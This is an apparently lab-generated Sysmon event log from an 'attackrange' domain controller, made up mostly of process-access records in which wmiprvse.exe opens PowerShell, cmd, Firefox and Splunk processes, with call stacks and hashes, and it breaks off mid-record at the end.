16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07176AF81F085C7080E20C01DCCC56BC,SHA256=3CE1ACA70625F04DAF4FBAF10329DBDCBF28E3A8A04D6E44B52BF70348EB2DAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\W